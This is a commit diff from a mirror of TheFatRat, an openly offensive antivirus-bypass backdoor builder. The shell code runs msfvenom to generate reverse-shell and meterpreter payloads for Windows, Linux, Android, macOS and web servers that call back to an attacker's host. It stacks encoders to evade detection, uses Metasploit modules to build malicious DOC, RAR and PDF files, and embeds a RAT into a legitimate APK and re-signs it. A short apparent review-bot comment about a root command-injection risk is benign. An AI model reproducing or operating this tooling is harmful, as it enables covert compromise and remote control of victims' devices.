mirror of https://github.com/Screetsec/TheFatRat.git synced 2023-12-14 02:02:58 +01:00

Merge pull request #53 from peterpt/master

version update 1.8.1
Edo -maland- 2017-02-27 12:27:12 +07:00 committed by GitHub
commit 133e9049e2
9 changed files with 323 additions and 148 deletions


@ -1,5 +1,9 @@
## CHANGELOG ## CHANGELOG
* v1.8.1 - added possibility to configure metasploit , backdoor-factory & searchsploit with manual inputs
* - added more packages instalations needed for non-pentest distribution & some bugs fixed
* v1.8 - add file pumper in TFR * v1.8 - add file pumper in TFR
* v1.8 - Backdoor with c program for meterpreter reverse_tcp * v1.8 - Backdoor with c program for meterpreter reverse_tcp
* v1.8 - Metasploit staging protocol ( c program ) * v1.8 - Metasploit staging protocol ( c program )


@ -17,7 +17,20 @@ RUN echo 'APT::Get::Install-Recommends "false";' >> /etc/apt/apt.conf \
backdoor-factory \ backdoor-factory \
monodevelop \ monodevelop \
ruby \ ruby \
apache2 apache2 \
upx-ucl \
xterm \
gnome-terminal \
default-jre \
default-jdk \
unzip \
aapt \
apktool \
dex2jar \
zlib1g-dev \
libmagickwand-dev \
imagemagick \
zipalign
WORKDIR /root/TheFatRat WORKDIR /root/TheFatRat
ADD . ./ ADD . ./


@ -3,7 +3,7 @@
#TheFatRat ( Unit for bypass av ) #TheFatRat ( Unit for bypass av )
##Update: Version 1.8 ##Update: Version 1.8.1
##Codename: Spark ##Codename: Spark
What is TheFatRat ?? What is TheFatRat ??
@ -87,7 +87,8 @@ And it's up & running.
## :heavy_exclamation_mark: Requirements ## :heavy_exclamation_mark: Requirements
- A linux operating system. We recommend Kali Linux 2 or Kali 2016.1 rolling / Cyborg / Parrot / Dracos / BackTrack / Backbox / and another operating system ( linux ) - A linux operating system. We recommend Kali Linux 2 or Kali 2016.1 rolling
Cyborg / Parrot / Dracos / BackTrack / Backbox / Devuan and another operating system ( linux )
- Must install metasploit framework - Must install metasploit framework

4
config/readme.md Normal file

@ -0,0 +1,4 @@
-----------------------------------------
|Folder for FatRat configuration files .|
| Do Not Remove this file . |
-----------------------------------------

157
fatrat

@ -22,23 +22,22 @@ white='\e[1;37m'
red='\e[1;31m' red='\e[1;31m'
yellow='\e[1;33m' yellow='\e[1;33m'
BlueF='\e[1;34m' BlueF='\e[1;34m'
path=`pwd`
#Checking #Checking
[[ `id -u` -eq 0 ]] || { echo -e $red "Must be root to run script"; exit 1; } [[ `id -u` -eq 0 ]] || { echo -e $red "Must be root to run script"; exit 1; }
resize -s 33 84 > /dev/null resize -s 33 84 > /dev/null
clear clear
file="config.path" file="config/config.path"
if [ -f "$file" ] if [ -f "$file" ]
then then
msfconsole=`sed -n 5p config.path` msfconsole=`sed -n 5p $file`
msfvenom=`sed -n 6p config.path` msfvenom=`sed -n 6p $file`
backdoor=`sed -n 7p config.path` backdoor=`sed -n 7p $file`
searchsploit=`sed -n 8p config.path` searchsploit=`sed -n 8p $file`
else else
echo "Configuration file does not exists , run setup.sh first ." echo "Configuration file does not exists , run setup.sh first ."
exit 1 exit 1
fi fi
@ -113,7 +112,7 @@ cat << !
# Some Variables # Some Variables
##################### #####################
path=`pwd` path=`pwd`
Versi=1.8 Versi=1.8.1
codename=Sparta codename=Sparta
OS=`uname` # OS=`uname` #
distro=`awk '{print $1}' /etc/issue` distro=`awk '{print $1}' /etc/issue`
@ -135,7 +134,9 @@ out='output/ip.txt'
pump='tools/pump.py' pump='tools/pump.py'
reverse1='temp/reverse1.c' reverse1='temp/reverse1.c'
stag='temp/stag.c' stag='temp/stag.c'
apkconfig=$path/config/apk.tmp
unzip=unzip
temp=$path/temp
################################################### ###################################################
# CTRL C # CTRL C
################################################### ###################################################
@ -158,7 +159,7 @@ exit
######################### #########################
#CHECK DEPENDICS #CHECK DEPENDICIES
######################### #########################
echo -e $cyan" ____ _ _ _ " echo -e $cyan" ____ _ _ _ "
echo " / ___| |__ ___ ___| | _(_)_ __ __ _ " echo " / ___| |__ ___ ___| | _(_)_ __ __ _ "
@ -174,10 +175,10 @@ if [ $(id -u) != "0" ]; then
echo [!]::[Check Dependencies] ; echo [!]::[Check Dependencies] ;
sleep 2 sleep 2
echo [✔]::[Check User]: $USER ; echo [✔]::[Check User]: $USER ;
echo [✔]::[Distro]: $distro ; echo [✔]::[Distro]: $distro ;
sleep 1 sleep 1
echo [x]::[not root]: you need to be [root] to run this script.; echo [x]::[not root]: you need to be [root] to run this script.;
echo "" echo ""
sleep 1 sleep 1
exit exit
@ -187,8 +188,8 @@ else
echo [!]::[Check Dependencies]: ; echo [!]::[Check Dependencies]: ;
sleep 1 sleep 1
echo [✔]::[Distro]: $distro ; echo [✔]::[Distro]: $distro ;
echo [✔]::[Check User]: $USER ; echo [✔]::[Check User]: $USER ;
fi fi
@ -211,7 +212,7 @@ fi
# check apache if exists # check apache if exists
which apache2 > /dev/null 2>&1 which apache2 > /dev/null 2>&1
if [ "$?" -eq "0" ]; then if [ "$?" -eq "0" ]; then
echo [✔]::[Apache2 Server $distro ]: installation found!; echo [✔]::[Apache2 Server $distro ]: installation found!;
else else
echo [x]::[warning]:this script require apache2 to work ; echo [x]::[warning]:this script require apache2 to work ;
@ -251,12 +252,12 @@ sleep 2
# check if msfvenom exists # check if msfvenom exists
which $msfvenom > /dev/null 2>&1 which $msfvenom > /dev/null 2>&1
if [ "$?" -eq "0" ]; then if [ "$?" -eq "0" ]; then
echo [✔]::[Msfvenom]: installation found!; echo [✔]::[Msfvenom]: installation found!;
else else
echo [x]::[warning]:this script require msfvenom installed to work ; echo [x]::[warning]:this script require msfvenom installed to work ;
echo "" echo ""
echo [!]::Run setup.sh to install metasploit-framework ; echo [!]::Run setup.sh to install metasploit-framework ;
sleep 3 sleep 3
exit 1 exit 1
fi fi
@ -559,7 +560,7 @@ echo ""
spinlong spinlong
echo "" echo ""
echo "" echo ""
$msfvenom -p $payload LHOST=$yourip LPORT=$yourport -f elf > output/$fira.elf $msfvenom -p $payload LHOST=$yourip LPORT=$yourport -f elf > output/$fira.elf
echo -e "Shell Saved To output Folder " echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '2' elif test $fatrat1 == '2'
then then
@ -574,7 +575,7 @@ echo ""
spinlong spinlong
echo "" echo ""
echo "" echo ""
$msfvenom -p $payload LHOST=$yourip LPORT=$yourport -f raw -e x86/shikata_ga_nai -i 10 | $msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | $msfvenom -a x86 --platform windows -e x86/jmp_call_additive -i 1| $msfvenom -a x86 --platform windows -e x86/call4_dword_xor -i 1 | $msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 1 -f exe -o output/$fira.exe $msfvenom -p $payload LHOST=$yourip LPORT=$yourport -f raw -e x86/shikata_ga_nai -i 10 | $msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | $msfvenom -a x86 --platform windows -e x86/jmp_call_additive -i 1| $msfvenom -a x86 --platform windows -e x86/call4_dword_xor -i 1 | $msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 1 -f exe -o output/$fira.exe
echo -e "Shell Saved To output Folder " echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '3' elif test $fatrat1 == '3'
then then
@ -589,7 +590,7 @@ echo ""
spinlong spinlong
echo "" echo ""
echo "" echo ""
$msfvenom -p android/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport R > output/$fira.apk $msfvenom -p android/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport R > output/$fira.apk
echo -e "Shell Saved To output Folder " echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '4' elif test $fatrat1 == '4'
then then
@ -604,7 +605,7 @@ echo ""
spinlong spinlong
echo "" echo ""
echo "" echo ""
$msfvenom -p osx/x86/shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f macho > output/$fira.macho $msfvenom -p osx/x86/shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f macho > output/$fira.macho
echo -e "Shell Saved To outputFolder " echo -e "Shell Saved To outputFolder "
elif test $fatrat1 == '5' elif test $fatrat1 == '5'
then then
@ -619,7 +620,7 @@ echo ""
spinlong2 spinlong2
echo "" echo ""
echo "" echo ""
$msfvenom -p php/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport R > output/$fira.php $msfvenom -p php/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport R > output/$fira.php
echo -e "Shell Saved To output Folder " echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '6' elif test $fatrat1 == '6'
then then
@ -634,7 +635,7 @@ echo ""
spinlong2 spinlong2
echo "" echo ""
echo "" echo ""
$msfvenom -p windows/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport -f asp > output/$fira.asp $msfvenom -p windows/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport -f asp > output/$fira.asp
echo -e "Shell Saved To output Folder " echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '7' elif test $fatrat1 == '7'
then then
@ -649,7 +650,7 @@ echo ""
spinlong2 spinlong2
echo "" echo ""
echo "" echo ""
$msfvenom -p java/jsp_shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f raw > output/$fira.jsp $msfvenom -p java/jsp_shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f raw > output/$fira.jsp
echo -e "Shell Saved To output Folder " echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '8' elif test $fatrat1 == '8'
then then
@ -664,7 +665,7 @@ echo ""
spinlong2 spinlong2
echo "" echo ""
echo "" echo ""
$msfvenom -p java/jsp_shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f war > output/$fira.war $msfvenom -p java/jsp_shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f war > output/$fira.war
echo -e "Shell Saved To output Folder " echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '9' elif test $fatrat1 == '9'
then then
@ -679,7 +680,7 @@ echo ""
spinlong2 spinlong2
echo "" echo ""
echo "" echo ""
$msfvenom -p cmd/unix/reverse_python LHOST=$yourip LPORT=$yourport -f raw > output/$fira.py $msfvenom -p cmd/unix/reverse_python LHOST=$yourip LPORT=$yourport -f raw > output/$fira.py
echo -e "Shell Saved To output Folder " echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '10' elif test $fatrat1 == '10'
then then
@ -694,7 +695,7 @@ echo ""
spinlong2 spinlong2
echo "" echo ""
echo "" echo ""
$msfvenom -p cmd/unix/reverse_bash LHOST=$yourip LPORT=$yourport -f raw > output/$fira.sh $msfvenom -p cmd/unix/reverse_bash LHOST=$yourip LPORT=$yourport -f raw > output/$fira.sh
echo -e "Shell Saved To output Folder " echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '11' elif test $fatrat1 == '11'
then then
@ -709,7 +710,7 @@ echo ""
spinlong2 spinlong2
echo "" echo ""
echo "" echo ""
$msfvenom -p cmd/unix/reverse_perl LHOST=$yourip LPORT=$yourport -f raw > output/$fira.pl $msfvenom -p cmd/unix/reverse_perl LHOST=$yourip LPORT=$yourport -f raw > output/$fira.pl
echo -e "Shell Saved To output Folder " echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '12' elif test $fatrat1 == '12'
@ -733,9 +734,9 @@ echo ""
gboor gboor
spinlong spinlong
echo "" echo ""
xterm -T " TheFatRat < DOC BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use exploit/windows/fileformat/ms12_027_mscomctl_bof; set payload $payloads ; set FILENAME $fira.doc; set lhost $yourip ; set lport $yourport; exploit; exit -y'" > /dev/null 2>&1 xterm -T " TheFatRat < DOC BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use exploit/windows/fileformat/ms12_027_mscomctl_bof; set payload $payloads ; set FILENAME $fira.doc; set lhost $yourip ; set lport $yourport; exploit; exit -y'"
echo "" echo ""
mv ~/.msf4/local/$fira.doc $path/output/$fira.doc mv ~/.msf4/local/$fira.doc $path/output/$fira.doc
echo -e $okegreen"" echo -e $okegreen""
echo -e $yellow" Backdoor doc Saved To output Folder " echo -e $yellow" Backdoor doc Saved To output Folder "
echo "" echo ""
@ -766,9 +767,9 @@ echo ""
gboor gboor
spinlong spinlong
echo "" echo ""
xterm -T " TheFatRat < RAR BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use exploit/windows/fileformat/winrar_name_spoofing; set payload $payloads; set FILENAME $fira; set SPOOF $fira2; set lhost $yourip; set lport $yourport; exploit; exit -y'" > /dev/null 2>&1 xterm -T " TheFatRat < RAR BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use exploit/windows/fileformat/winrar_name_spoofing; set payload $payloads; set FILENAME $fira; set SPOOF $fira2; set lhost $yourip; set lport $yourport; exploit; exit -y'"
echo "" echo ""
mv ~/.msf4/local/$fira $path/output/$fira mv ~/.msf4/local/$fira $path/output/$fira
echo -e $okegreen"" echo -e $okegreen""
echo -e $yellow" Backdoor Saved To output Folder " echo -e $yellow" Backdoor Saved To output Folder "
echo "" echo ""
@ -834,8 +835,8 @@ echo -e $okegreen" ============================================================
echo set LPORT $uservar >> "temp/meterpreter_linux.rc" echo set LPORT $uservar >> "temp/meterpreter_linux.rc"
echo set ExitOnSession false >> "temp/meterpreter_linux.rc" echo set ExitOnSession false >> "temp/meterpreter_linux.rc"
echo exploit -j >> "temp/meterpreter_linux.rc" echo exploit -j >> "temp/meterpreter_linux.rc"
xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_linux.rc" & xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_linux.rc"
clear clear
elif test $fatrat1 == '2' #Windows elif test $fatrat1 == '2' #Windows
then then
rm temp/*.rc > /dev/null 2>&1 rm temp/*.rc > /dev/null 2>&1
@ -852,7 +853,7 @@ echo -e $okegreen" ============================================================
echo set AutoRunScript multi_console_command -rc $path/postexploit/$pe >> "temp/meterpreter_windows.rc" echo set AutoRunScript multi_console_command -rc $path/postexploit/$pe >> "temp/meterpreter_windows.rc"
echo set ExitOnSession false >> "temp/meterpreter_windows.rc" echo set ExitOnSession false >> "temp/meterpreter_windows.rc"
echo exploit -j >> "temp/meterpreter_windows.rc" echo exploit -j >> "temp/meterpreter_windows.rc"
xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_windows.rc" & xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_windows.rc"
clear clear
elif test $fatrat1 == '3' #Mac elif test $fatrat1 == '3' #Mac
then then
@ -867,7 +868,7 @@ echo -e $okegreen" ============================================================
echo set LPORT $uservar >> "temp/meterpreter_mac.rc" echo set LPORT $uservar >> "temp/meterpreter_mac.rc"
echo set ExitOnSession false >> "temp/meterpreter_mac.rc" echo set ExitOnSession false >> "temp/meterpreter_mac.rc"
echo exploit -j >> "temp/meterpreter_mac.rc" echo exploit -j >> "temp/meterpreter_mac.rc"
xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_mac.rc" & xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_mac.rc"
clear clear
elif test $fatrat1 == '4' #Android elif test $fatrat1 == '4' #Android
@ -884,7 +885,7 @@ echo -e $okegreen" ============================================================
echo set LPORT $uservar >> "temp/meterpreter_android.rc" echo set LPORT $uservar >> "temp/meterpreter_android.rc"
echo set ExitOnSession false >> "temp/meterpreter_android.rc" echo set ExitOnSession false >> "temp/meterpreter_android.rc"
echo exploit -j >> "temp/meterpreter_android.rc" echo exploit -j >> "temp/meterpreter_android.rc"
xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_android.rc" & xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_android.rc"
clear clear
elif test $fatrat1 == '5' elif test $fatrat1 == '5'
@ -927,7 +928,12 @@ echo -e $okegreen"[ ]$red Embed a Metasploit Payload in an original .
echo -e $okegreen"[ ]$red This script is POC for injecting metasploit payload arbitary apk backdoor $okegreen[ ]" echo -e $okegreen"[ ]$red This script is POC for injecting metasploit payload arbitary apk backdoor $okegreen[ ]"
echo -e $okegreen"[ ]$okegreen===========================================================================$okegreen[ ]" echo -e $okegreen"[ ]$okegreen===========================================================================$okegreen[ ]"
echo "" echo ""
echo "Cleaning Temp files"
rm -rf output/*
sleep 2
echo "Done!"
echo -e $okegreen"" echo -e $okegreen""
sleep 1
echo -ne " SET LHOST : ";tput sgr0 echo -ne " SET LHOST : ";tput sgr0
read yourip read yourip
echo "" echo ""
@ -936,7 +942,22 @@ read yourport
echo "" echo ""
echo -ne $okegreen "Located Original Apk file for embed (example:$path/PE/instagram.apk) :" ;tput sgr0 echo -ne $okegreen "Located Original Apk file for embed (example:$path/PE/instagram.apk) :" ;tput sgr0
read copyfile read copyfile
cp $copyfile $path/output/fatrat.apk cp $copyfile $path/output/fatrat.apk
apkt="$path/output/fatrat.apk"
if [ ! -f $apkt ]; then
echo "[!] There was an error copying your APK to a temporary folder , make sure you wrote the right path "
read -rsp $'Press any key to continue to return to fatrat menu\n' -n 1 key
menu
fi
$unzip -l $apkt > /dev/null 2>&1
rc=$?
if [ $rc != 0 ]; then
echo "[!] Original APK file specified is not valid"
read -rsp $'Press any key to continue to return to fatrat menu\n' -n 1 key
menu
fi
echo "" echo ""
payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "android/meterpreter/reverse_http" FALSE "android/meterpreter/reverse_https" FALSE "android/meterpreter/reverse_tcp" FALSE "android/shell/reverse_http" FALSE "android/shell/reverse_https" FALSE "android/shell/reverse_tcp" --width 350 --height 300) > /dev/null 2>&1 payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "android/meterpreter/reverse_http" FALSE "android/meterpreter/reverse_https" FALSE "android/meterpreter/reverse_tcp" FALSE "android/shell/reverse_http" FALSE "android/shell/reverse_https" FALSE "android/shell/reverse_tcp" --width 350 --height 300) > /dev/null 2>&1
echo "" echo ""
@ -946,16 +967,36 @@ spinlong
gboor2 gboor2
spinlong spinlong
echo "" echo ""
sleep 1
echo "Creating RAT payload with msfvenom"
$msfvenom -f raw -p $payload LHOST=$yourip LPORT=$yourport -o $path/output/payload.apk
echo "Done !"
sleep 2
echo "Starting the merging process of RAT with the APK you selected"
echo "" echo ""
ruby $apkembed $path/output/fatrat.apk
echo "" echo ""
echo "" echo "Merge completed of Payload with your APK"
ruby $apkembed output/fatrat.apk -p $payload LHOST=$yourip LPORT=$yourport sleep 2
echo "" cp $path/output/fatrat_backdoored.apk $path/backdoored/apkembed.apk
cp $path/output/output/fatrat_backdoored.apk backdoored/apkembed.apk echo "File copied with success to : $path/backdoored"
rm -rf $path/output/* sleep 2
java -jar $bundle $cert $key $path/backdoored/apkembed.apk $path/output/Apk_embed_backdoor.apk echo "Removing temporary files from output"
rm backdoored/apkembed.apk sleep 2
echo -ne $okegreen" Your payload has been successfully embed with sign and is located here ( output folder ) " rm -rf $path/output/*
echo "Signing your APK file"
sleep 2
java -jar $bundle $cert $key $path/backdoored/apkembed.apk Apk_embed_backdoor.apk
rm $path/backdoored/apkembed.apk
mv $path/Apk_embed_backdoor.apk $path/backdoored/output/
outapk="$path/backdoored/output/Apk_embed_backdoor.apk"
if [ ! -f $outapk ]; then
echo "[!] APK Rat file was not found in : $path/backdoored/output/"
read -rsp $'Press any key to continue to return to fatrat menu\n' -n 1 key
menu
fi
echo -ne $okegreen" Your payload has been successfully embed with sign and is located here :
$path/backdoored/output/Apk_embed_backdoor.apk"
read loveyou read loveyou
echo echo
clear clear
@ -1031,7 +1072,7 @@ echo -e $red" Powershell$cyan Injection attacks on any$red Windows Platfo
cat powershell_attack.txt cat powershell_attack.txt
sleep 2 sleep 2
rm unicorn.rc rm unicorn.rc
mv powershell_attack.txt output/$fira.bat mv powershell_attack.txt output/$fira.bat
echo "" echo ""
echo -e $okegreen"" echo -e $okegreen""
echo -e "Backdoor Saved To output Folder " echo -e "Backdoor Saved To output Folder "
@ -1199,7 +1240,7 @@ echo -e $red" Powershell$cyan Injection attacks on any$red Windows Platfo
echo " Wait for embed exe to pdf .... " echo " Wait for embed exe to pdf .... "
xterm -T " TheFatRat < PDF BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use windows/fileformat/adobe_pdf_embedded_exe; set EXE::Custom $path/output/backdoor_for_pdf.exe; set FILENAME $fira.pdf; set INFILENAME $embedpdf; exploit; exit -y'" > /dev/null 2>&1 xterm -T " TheFatRat < PDF BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use windows/fileformat/adobe_pdf_embedded_exe; set EXE::Custom $path/output/backdoor_for_pdf.exe; set FILENAME $fira.pdf; set INFILENAME $embedpdf; exploit; exit -y'" > /dev/null 2>&1
echo "" echo ""
mv ~/.msf4/local/$fira.pdf $path/output/$fira.pdf mv ~/.msf4/local/$fira.pdf $path/output/$fira.pdf
rm unicorn.rc powershell_attack.txt rm unicorn.rc powershell_attack.txt
echo -e $okegreen"" echo -e $okegreen""
echo -e $yellow" Backdoor PDF Saved To output Folder " echo -e $yellow" Backdoor PDF Saved To output Folder "
@ -1506,7 +1547,7 @@ echo -e $red" Powershell$cyan Injection attacks on any$red Windows Platfo
echo ' function();'>>$stag echo ' function();'>>$stag
echo ' return 0;'>>$stag echo ' return 0;'>>$stag
echo '}' >> $stag echo '}' >> $stag
$COMPILER $stag -o output/$fira.exe -lws2_32 $COMPILER $stag -o output/$fira.exe -lws2_32
echo echo
echo -e $yellow " [+]"$okegreen"Compiling Binary Done ";tput sgr0 echo -e $yellow " [+]"$okegreen"Compiling Binary Done ";tput sgr0
rm $stag rm $stag
@ -1916,7 +1957,7 @@ menu () {
elif test $fatrat == '2' elif test $fatrat == '2'
then then
chmod +x powerfull.sh chmod +x powerfull.sh
xterm -fa monaco -fs 13 -bg black ./powerfull.sh xterm -fa monaco -fs 13 -bg black ./powerfull.sh
elif test $fatrat == '3' elif test $fatrat == '3'
then then
@ -1936,7 +1977,7 @@ menu () {
spinlong2 spinlong2
echo "" echo ""
echo -e $okegreen"" echo -e $okegreen""
$backdoor -f $embed -s $payload -H $yourip -P $yourport -o output/$fira.exe $backdoor -f $embed -s $payload -H $yourip -P $yourport -o output/$fira.exe
echo -e "Shell Saved To /backdoored/output/ press any key to continue" echo -e "Shell Saved To /backdoored/output/ press any key to continue"
read bebeku read bebeku
clear clear
@ -1956,7 +1997,7 @@ menu () {
elif test $fatrat == '8' elif test $fatrat == '8'
then then
xterm -fa monaco -fs 13 -bg black -e "$msfconsole" xterm -fa monaco -fs 13 -bg black -e "$msfconsole"
elif test $fatrat == '9' elif test $fatrat == '9'
then then
@ -2114,7 +2155,7 @@ echo
elif test $fatrat == '2' elif test $fatrat == '2'
then then
chmod +x powerfull.sh chmod +x powerfull.sh
xterm -fa monaco -fs 13 -bg black ./powerfull.sh xterm -fa monaco -fs 13 -bg black ./powerfull.sh
elif test $fatrat == '3' elif test $fatrat == '3'
then then
@ -2134,7 +2175,7 @@ echo
spinlong2 spinlong2
echo "" echo ""
echo -e $okegreen"" echo -e $okegreen""
$backdoor -f $embed -s $payload -H $yourip -P $yourport -o output/$fira.exe $backdoor -f $embed -s $payload -H $yourip -P $yourport -o output/$fira.exe
echo -e "Shell Saved To /backdoored/output/ press any key to continue" echo -e "Shell Saved To /backdoored/output/ press any key to continue"
read bebeku read bebeku
clear clear
@ -2154,7 +2195,7 @@ echo
elif test $fatrat == '8' elif test $fatrat == '8'
then then
xterm -fa monaco -fs 13 -bg black -e "$msfconsole" xterm -fa monaco -fs 13 -bg black -e "$msfconsole"
elif test $fatrat == '9' elif test $fatrat == '9'
then then
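Review bot: The first hunk of `fatrat` now reads the tool paths from `config/config.path`, which is resolved against the caller's working directory, and the script later expands those values unquoted as commands while running as root (`which $msfvenom`, `$msfvenom -p ...`, `$backdoor -f ...`), so lines 5-8 of any file with that name in the current directory are executed with root privileges. Resolve the file relative to the script instead, e.g. `file="$(dirname "$(readlink -f "$0")")/config/config.path"`, and stop unless it is root-owned and not writable by group or others, e.g. `[ -O "$file" ] && [ -z "$(find "$file" -perm /022)" ] || exit 1`. The same four `sed -n Np $file` assignments appear in the later file section that begins with `#!/bin/bash` and need the same treatment. Separately, the APK hunk adds `rm -rf output/*` and `cp $copyfile $path/output/fatrat.apk` with a cwd-relative glob and an unquoted value from `read copyfile`; quoting them and writing the glob as `"${path:?}/output/"*` would keep an empty or space-containing value from removing or copying the wrong files.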

3
logs/readme.md Normal file

@ -0,0 +1,3 @@
*******************************************************************************
* All TheFatRat logs will be stored in this folder , do not delete this file! *
*******************************************************************************


@ -1,11 +1,11 @@
#!/bin/bash #!/bin/bash
file="config.path" file="config/config.path"
if [ -f "$file" ] if [ -f "$file" ]
then then
msfconsole=`sed -n 5p config.path` msfconsole=`sed -n 5p $file`
msfvenom=`sed -n 6p config.path` msfvenom=`sed -n 6p $file`
backdoor=`sed -n 7p config.path` backdoor=`sed -n 7p $file`
searchsploit=`sed -n 8p config.path` searchsploit=`sed -n 8p $file`
else else
echo "Configuration file does not exists , run setup.sh first ." echo "Configuration file does not exists , run setup.sh first ."
exit 1 exit 1

242
setup.sh

@ -8,11 +8,19 @@ sleep 4s
rm -f /etc/apt/sources.list rm -f /etc/apt/sources.list
mv /etc/apt/sources.list.fatrat /etc/apt/sources.list mv /etc/apt/sources.list.fatrat /etc/apt/sources.list
echo "Your Original repository list was recovered. ;) ..... beginning setup" echo "Your Original repository list was recovered. ;) ..... beginning setup"
echo ""
echo "Cleaning previous repositories cache & updating your repository ."
sudo apt-get clean && apt-get update -y
sleep 3s sleep 3s
else else
echo "" echo ""
fi fi
path=`pwd`
log=$path/logs/setup.log
config=$path/config/config.path
#Removing any previous setup log created
rm -f $log
# setup.sh Author : Edo maland ( Screetsec ) # setup.sh Author : Edo maland ( Screetsec )
# Install all dependencies nedded # Install all dependencies nedded
# configuration all file for fixing all problem # configuration all file for fixing all problem
@ -20,7 +28,7 @@ fi
#Check root dulu #Check root dulu
[[ `id -u` -eq 0 ]] || { echo -e "\e[31m Must be root to run script"; exit 1; } [[ `id -u` -eq 0 ]] || { echo -e "\e[31m Must be root to run script"; exit 1; }
resize -s 30 73 > /dev/null resize -s 30 73 > /dev/null 2>&1
clear clear
@ -48,11 +56,16 @@ echo " [ ] Use this script to configure fatrat [ ]"
echo " [ ] Install all dependencies [ ]" echo " [ ] Install all dependencies [ ]"
echo " [ ]=================================================[ ]"; echo " [ ]=================================================[ ]";
echo "" echo ""
touch $log
echo "------------------------------------------------------" >> $log
echo "| Tools paths configured in (setup.sh) for TheFatRat |" >> $log
echo "------------------------------------------------------" >> $log
echo " " >> $log
#check if xterm is installed #check if xterm is installed
which xterm > /dev/null 2>&1 which xterm > /dev/null 2>&1
if [ "$?" -eq "0" ]; then if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Xterm.............................[ found ]" echo "[ ✔ ] Xterm.............................[ found ]"
which xterm >> $log 2>&1
sleep 2 sleep 2
else else
echo "" echo ""
@ -62,12 +75,14 @@ sleep 2
sudo apt-get install xterm -y sudo apt-get install xterm -y
clear clear
echo "[ ✔ ] Done installing .... " echo "[ ✔ ] Done installing .... "
which xterm >> $log 2>&1
fi fi
#check if zenity its installed #check if zenity its installed
which zenity > /dev/null 2>&1 which zenity > /dev/null 2>&1
if [ "$?" -eq "0" ]; then if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Zenity............................[ found ]" echo "[ ✔ ] Zenity............................[ found ]"
which zenity >> $log 2>&1
sleep 2 sleep 2
else else
echo "" echo ""
@ -77,18 +92,21 @@ sleep 2
echo "[ ! ] Installing zenity from your apt sources ]" echo "[ ! ] Installing zenity from your apt sources ]"
xterm -T "☣ INSTALL ZENITY ☣" -geometry 100x30 -e "sudo apt-get install zenity -y" xterm -T "☣ INSTALL ZENITY ☣" -geometry 100x30 -e "sudo apt-get install zenity -y"
echo "[ ✔ ] Done installing .... " echo "[ ✔ ] Done installing .... "
which zenity >> $log 2>&1
fi fi
# check if gcc exists # check if gcc exists
which gcc > /dev/null 2>&1 which gcc > /dev/null 2>&1
if [ "$?" -eq "0" ]; then if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Gcc compiler......................[ found ]" echo "[ ✔ ] Gcc compiler......................[ found ]"
which gcc >> $log 2>&1
sleep 2 sleep 2
else else
echo "[ X ] gcc compiler -> not found ]" echo "[ X ] gcc compiler -> not found ]"
echo "[ ! ] Installing gcc from your apt sources ]" echo "[ ! ] Installing gcc from your apt sources ]"
xterm -T "☣ INSTALL GCC COMPILLER ☣" -geometry 100x30 -e "sudo apt-get install gcc -y" xterm -T "☣ INSTALL GCC COMPILLER ☣" -geometry 100x30 -e "sudo apt-get install gcc -y"
echo "[ ✔ ] Done installing .... " echo "[ ✔ ] Done installing .... "
which gcc >> $log 2>&1
sleep 2 sleep 2
fi fi
@ -96,12 +114,14 @@ fi
which i586-mingw32msvc-gcc > /dev/null 2>&1 which i586-mingw32msvc-gcc > /dev/null 2>&1
if [ "$?" -eq "0" ]; then if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Mingw32 Compiler..................[ found ]" echo "[ ✔ ] Mingw32 Compiler..................[ found ]"
which i586-mingw32msvc-gcc >> $log 2>&1
sleep 2 sleep 2
else else
echo "[ X ] mingw32 compiler -> not found ]" echo "[ X ] mingw32 compiler -> not found ]"
echo "[ ! ] Installing zenity from your apt sources ]" echo "[ ! ] Installing zenity from your apt sources ]"
xterm -T "☣ INSTALL MINGW32 COMPILLER ☣" -geometry 100x30 -e "sudo apt-get install mingw32 -y" xterm -T "☣ INSTALL MINGW32 COMPILLER ☣" -geometry 100x30 -e "sudo apt-get install mingw32 -y"
